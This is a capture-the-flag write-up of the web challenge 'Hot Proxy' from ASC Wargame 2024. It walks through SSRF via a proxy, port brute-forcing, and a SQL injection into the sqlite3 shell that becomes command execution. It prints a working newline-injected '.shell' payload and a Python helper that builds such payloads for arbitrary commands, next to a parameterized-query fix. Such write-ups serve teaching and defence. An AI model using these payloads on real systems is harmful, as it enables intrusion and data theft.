[WEB] ASC Wargame CTF 2024 - Challenge Hot Proxy

(In the name of Allah, the Most Gracious, the Most Merciful)
(If I have done well, it is from Allah; if I have erred, it is from myself and Satan)


It was a nice CTF; my team and I got 2nd place:

A picture taken while solving this challenge in the last 5 minutes of the CTF (when we still thought we had 1st place).

Let's walk through the web challenge Hot Proxy. Note that we did not solve it within the CTF window; we missed it by about a minute. Let's start.

Note: there was no source code in the challenge attachment, so I requested it from the author (@serWazito0), thanks to him. Challenge files: ( ASCWG_2024_CTF ).

Note: the flag file on the server is named "flag_<RANDOM>.txt", so a fixed-path file read is not enough; we have to get RCE (or at least run a command that can use a wildcard).

From the title we know the challenge is about an "SSRF" vulnerability, and from the description we know there is an internal application called "app1" with a route called "/secret", so our target is to reach that route through the proxy.

My first try was to put the full URL of the internal application in the request line (an absolute-form request target, which a forward proxy will try to fetch on our behalf):

GET http://app1/secret HTTP/1.1

The proxy accepted it and tried to fetch the URL, but answered with the error "Error fetching the URL."


During the CTF there was an announcement hinting at brute forcing, so we brute-forced the ports of app1 through the proxy. Port (9001) gave a different response, and that response was the application's source code, so now we have the code.


After reviewing the code we found that:

  • There is a SQL injection, and the database is SQLite3.
  • There is a filter we have to bypass, the function "contains_blacklist".
  • The SQL is not run through a library binding: the function "cursors_execute" executes the query inside the SQLite shell prompt itself (the sqlite3 command-line shell), so whatever we inject is read by that shell.


So how can we turn a SQL injection that is executed by the SQLite3 shell into RCE, and read the flag?

After asking Google we ended up with this screenshot (the sqlite3 shell's dot-commands, in particular ".shell", which runs an operating-system command from inside the shell):


After trying it we hit an issue that we did not notice at first (maybe because it was 2 minutes before the end of the CTF and focus was low). Then another hint made it click: the query is being typed into a shell, so what do we do after writing a line in a shell? Yes, ENTER. But how can we send an ENTER through a query parameter?

We tried a lot of things and nothing worked, until a URL-encoded newline (%0a) turned out to act as ENTER. The sqlite3 shell only treats a line starting with "." as a dot-command when that line stands on its own and no unfinished SQL statement is pending, so the payload has to close the injected string and terminate the statement first ('; ), put the .shell command on a new line, and then open a new statement (;select ') so the rest of the application's query still parses. The following payload reads the flag, and BINGO:
GET http://app1:9001/?username=flex';%0a.shell+cat+flag*%0a;select+' HTTP/1.1
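To make the mechanics above concrete, here is an added Python model of the chain (this is example code written for this write-up, not app1's code, and the query template, table name and the absence of the blacklist are assumptions). It does not spawn the real sqlite3 binary; sqlite_shell_feed() mimics how the sqlite3 CLI splits its input into SQL statements and dot-commands, using sqlite3.complete_statement(), which is the same sqlite3_complete() check the real shell uses. It builds the write-up's payload shape for an arbitrary command, shows which line the shell would run as ".shell", and contrasts it with a parameterized query, where the same value is just a string with no user named that way.

```python
"""Model of the Hot Proxy SQLi -> sqlite3 shell -> .shell chain.

Constructed example: the query template and the users table are assumptions,
not app1's real code. Nothing here spawns the sqlite3 binary; the shell's
line handling is approximated with sqlite3.complete_statement().
"""
import sqlite3
from urllib.parse import quote_plus, unquote_plus

# Assumed template for the query app1 splices the ?username= value into.
QUERY_TEMPLATE = "SELECT id FROM users WHERE username = '{username}';"


def build_payload(command: str) -> str:
    """URL-encode the write-up's payload shape for an arbitrary OS command.

    Layout: close the string literal and terminate the statement ('; ),
    newline, a .shell dot-command on a line of its own, newline, then
    ;select ' so the remainder of the template still parses.
    """
    raw = f"flex';\n.shell {command}\n;select '"
    # Spaces become '+' and newlines '%0A', as in the request in the write-up.
    return quote_plus(raw, safe="';*")


def splice(encoded_username: str) -> str:
    """What a string-formatting application does with the raw parameter."""
    return QUERY_TEMPLATE.format(username=unquote_plus(encoded_username))


def sqlite_shell_feed(script: str):
    """Approximate the sqlite3 CLI's input loop (shell.c process_input).

    A line whose first character is '.' is a dot-command *only* while no
    partial SQL statement is pending; everything else accumulates until
    sqlite3_complete() reports a finished statement. Returns the
    dot-commands the shell would run and the SQL statements it would execute.
    """
    dot_commands, statements, pending = [], [], ""
    for line in script.split("\n"):
        if not pending:
            line = line.lstrip()
            if not line:
                continue
            if line.startswith("."):
                dot_commands.append(line)
                continue
        pending += line + "\n"
        if sqlite3.complete_statement(pending):
            statements.append(pending.strip())
            pending = ""
    return dot_commands, statements


def safe_lookup(conn: sqlite3.Connection, username: str):
    """Hardened form: the library binds the value as data. There is no shell
    reading lines, so neither a newline nor a leading '.' means anything."""
    return conn.execute(
        "SELECT id FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo():
    payload = build_payload("cat flag*")
    dots, stmts = sqlite_shell_feed(splice(payload))

    # Constructed in-memory table standing in for app1's database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users (username) VALUES ('flex')")
    hardened_rows = safe_lookup(conn, unquote_plus(payload))
    return payload, dots, stmts, hardened_rows


if __name__ == "__main__":
    payload, dots, stmts, rows = demo()
    print("payload:       ", payload)
    print("dot-commands:  ", dots)
    print("SQL statements:", stmts)
    print("parameterized: ", rows)
```

Running it shows the three-line script the shell receives: the closed statement for user flex, the ".shell cat flag*" line that the shell executes as a command, and the trailing ";select '';" that keeps the original query syntactically valid. The parameterized lookup returns no rows for the same input, because the whole payload is compared as a username instead of being parsed.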

But xD, we could not find the flag during the CTF: for some reason the response only listed the (app, DB) folder, not all files and folders, and for some reason I did not think of using (*). We got it with the author after the CTF, missing the deadline by one minute xD.

Thanks for reading ;-)

On the authority of the Mother of the Believers, Umm Abdullah Aisha (may Allah be pleased with her), who said: The Messenger of Allah said: "Whoever introduces into this matter of ours that which is not part of it, it is rejected." Narrated by al-Bukhari and Muslim; and in a narration of Muslim: "Whoever does a deed that is not in accordance with our matter, it is rejected."

